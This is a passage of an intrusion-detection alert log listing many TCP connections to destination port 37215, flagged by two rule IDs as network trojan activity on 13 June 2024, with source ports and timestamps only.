              SID:2829579
              Source Port:51878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343482
              SID:2835222
              Source Port:47318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614397
              SID:2835222
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605818
              SID:2829579
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301262
              SID:2835222
              Source Port:38492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821508
              SID:2829579
              Source Port:58290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677581
              SID:2835222
              Source Port:44430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379264
              SID:2835222
              Source Port:45736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671908
              SID:2829579
              Source Port:60528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613260
              SID:2829579
              Source Port:40686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354958
              SID:2835222
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456564
              SID:2835222
              Source Port:58670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043500
              SID:2829579
              Source Port:39612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100958
              SID:2835222
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477042
              SID:2829579
              Source Port:55664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785195
              SID:2829579
              Source Port:48574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869622
              SID:2835222
              Source Port:39384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231022
              SID:2829579
              Source Port:36170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657343
              SID:2835222
              Source Port:56370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711950
              SID:2829579
              Source Port:48358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132628
              SID:2835222
              Source Port:43100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458108
              SID:2835222
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258989
              SID:2829579
              Source Port:59246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279463
              SID:2829579
              Source Port:35390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127825
              SID:2835222
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166290
              SID:2835222
              Source Port:36154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167194
              SID:2835222
              Source Port:48348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457667
              SID:2835222
              Source Port:34066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872695
              SID:2829579
              Source Port:55670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176642
              SID:2829579
              Source Port:44894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838417
              SID:2829579
              Source Port:36332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417464
              SID:2829579
              Source Port:52938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090451
              SID:2829579
              Source Port:45092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039478
              SID:2829579
              Source Port:54508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836941
              SID:2829579
              Source Port:59872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400525
              SID:2835222
              Source Port:35048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273102
              SID:2835222
              Source Port:52640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315886
              SID:2829579
              Source Port:34812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057413
              SID:2835222
              Source Port:35978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675577
              SID:2835222
              Source Port:50206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195696
              SID:2835222
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273664
              SID:2835222
              Source Port:43222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177304
              SID:2829579
              Source Port:41006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199622
              SID:2829579
              Source Port:36364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.029006
              SID:2829579
              Source Port:46634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177441
              SID:2829579
              Source Port:59192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439708
              SID:2835222
              Source Port:38434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090678
              SID:2835222
              Source Port:44200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658382
              SID:2835222
              Source Port:55932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943047
              SID:2835222
              Source Port:34626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304691
              SID:2829579
              Source Port:56820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043108
              SID:2829579
              Source Port:57336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370719
              SID:2835222
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568541
              SID:2829579
              Source Port:53480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091503
              SID:2829579
              Source Port:47784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408281
              SID:2829579
              Source Port:38040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696253
              SID:2829579
              Source Port:35502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274437
              SID:2829579
              Source Port:39374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697163
              SID:2829579
              Source Port:42152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041735
              SID:2829579
              Source Port:36466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277399
              SID:2835222
              Source Port:46694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676198
              SID:2835222
              Source Port:45406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213740
              SID:2829579
              Source Port:57902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440884
              SID:2829579
              Source Port:34386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868361
              SID:2835222
              Source Port:34330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106167
              SID:2829579
              Source Port:37192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570892
              SID:2835222
              Source Port:48058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909490
              SID:2829579
              Source Port:58372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060506
              SID:2835222
              Source Port:41570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038293
              SID:2829579
              Source Port:39318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251564
              SID:2829579
              Source Port:36600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025624
              SID:2835222
              Source Port:59416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632907
              SID:2829579
              Source Port:59146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551851
              SID:2829579
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660671
              SID:2829579
              Source Port:57974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913796
              SID:2829579
              Source Port:58774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710986
              SID:2835222
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303649
              SID:2835222
              Source Port:35540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171418
              SID:2835222
              Source Port:37430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555858
              SID:2835222
              Source Port:58860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308103
              SID:2829579
              Source Port:33164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783048
              SID:2829579
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909420
              SID:2829579
              Source Port:54410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638175
              SID:2829579
              Source Port:53846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180526
              SID:2835222
              Source Port:59696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509393
              SID:2829579
              Source Port:57234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200284
              SID:2835222
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039734
              SID:2829579
              Source Port:37078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195259
              SID:2835222
              Source Port:39742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487889
              SID:2829579
              Source Port:39064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048507
              SID:2829579
              Source Port:48920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787564
              SID:2829579
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276526
              SID:2835222
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043531
              SID:2829579
              Source Port:46950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346569
              SID:2835222
              Source Port:51990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170307
              SID:2835222
              Source Port:57122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028666
              SID:2835222
              Source Port:57074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972994
              SID:2835222
              Source Port:34972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247243
              SID:2835222
              Source Port:57546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375780
              SID:2829579
              Source Port:46696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753569
              SID:2829579
              Source Port:56600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567810
              SID:2835222
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173948
              SID:2835222
              Source Port:52426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804612
              SID:2835222
              Source Port:44726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058368
              SID:2835222
              Source Port:49220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191532
              SID:2835222
              Source Port:41796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480605
              SID:2829579
              Source Port:56454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555901
              SID:2835222
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914159
              SID:2829579
              Source Port:39212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128236
              SID:2829579
              Source Port:42358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213192
              SID:2835222
              Source Port:36134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871786
              SID:2829579
              Source Port:51740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089574
              SID:2829579
              Source Port:59302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259270
              SID:2835222
              Source Port:55296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277881
              SID:2829579
              Source Port:58916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353541
              SID:2829579
              Source Port:37444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350425
              SID:2829579
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509482
              SID:2829579
              Source Port:34422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098873
              SID:2835222
              Source Port:48630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420184
              SID:2829579
              Source Port:52608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674912
              SID:2829579
              Source Port:53522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316191
              SID:2829579
              Source Port:52322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159014
              SID:2829579
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377746
              SID:2835222
              Source Port:53182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565173
              SID:2835222
              Source Port:35216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833687
              SID:2829579
              Source Port:48332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320670
              SID:2835222
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506641
              SID:2835222
              Source Port:56922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480118
              SID:2829579
              Source Port:50804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024390
              SID:2829579
              Source Port:59048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407594
              SID:2829579
              Source Port:57856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706931
              SID:2829579
              Source Port:56418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565118
              SID:2835222
              Source Port:48322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887902
              SID:2835222
              Source Port:54808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268957
              SID:2835222
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487102
              SID:2829579
              Source Port:49870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212628
              SID:2835222
              Source Port:51018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408002
              SID:2835222
              Source Port:33586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157406
              SID:2829579
              Source Port:57356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458068
              SID:2829579
              Source Port:53854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042388
              SID:2829579
              Source Port:58196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669217
              SID:2835222
              Source Port:60134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265932
              SID:2829579
              Source Port:58446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545486
              SID:2835222
              Source Port:33026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544391
              SID:2829579
              Source Port:55546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486750
              SID:2829579
              Source Port:53412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629173
              SID:2829579
              Source Port:38450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908902
              SID:2835222
              Source Port:59362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420551
              SID:2829579
              Source Port:45790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014210
              SID:2829579
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570266
              SID:2829579
              Source Port:40920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160571
              SID:2835222
              Source Port:37934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475461
              SID:2835222
              Source Port:55782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655698
              SID:2835222
              Source Port:47074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424132
              SID:2829579
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424593
              SID:2835222
              Source Port:58650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016461
              SID:2829579
              Source Port:43712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870796
              SID:2835222
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302631
              SID:2835222
              Source Port:55490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613701
              SID:2829579
              Source Port:56388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195647
              SID:2829579
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452272
              SID:2835222
              Source Port:56028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359212
              SID:2835222
              Source Port:58934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401904
              SID:2829579
              Source Port:37112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937764
              SID:2835222
              Source Port:43286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013228
              SID:2829579
              Source Port:47696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223518
              SID:2835222
              Source Port:41730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213075
              SID:2835222
              Source Port:52444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197884
              SID:2829579
              Source Port:43894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217830
              SID:2835222
              Source Port:44476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945349
              SID:2829579
              Source Port:33126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177695
              SID:2835222
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565281
              SID:2835222
              Source Port:33846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679837
              SID:2835222
              Source Port:56986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553379
              SID:2829579
              Source Port:59748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026719
              SID:2829579
              Source Port:42852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525565
              SID:2829579
              Source Port:47686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454181
              SID:2829579
              Source Port:49820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154509
              SID:2829579
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217689
              SID:2829579
              Source Port:47016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093787
              SID:2835222
              Source Port:41756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154928
              SID:2829579
              Source Port:42614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160187
              SID:2835222
              Source Port:37626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833504
              SID:2829579
              Source Port:54564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707992
              SID:2835222
              Source Port:57944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014912
              SID:2835222
              Source Port:37558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228210
              SID:2835222
              Source Port:41334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570225
              SID:2829579
              Source Port:39848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132921
              SID:2835222
              Source Port:36992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611605
              SID:2829579
              Source Port:48822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888727
              SID:2835222
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196923
              SID:2829579
              Source Port:59892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438804
              SID:2835222
              Source Port:59122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192999
              SID:2835222
              Source Port:45430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167932
              SID:2829579
              Source Port:37372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801516
              SID:2835222
              Source Port:53348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606880
              SID:2835222
              Source Port:50784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759156
              SID:2829579
              Source Port:42244
              Destination Port:37215
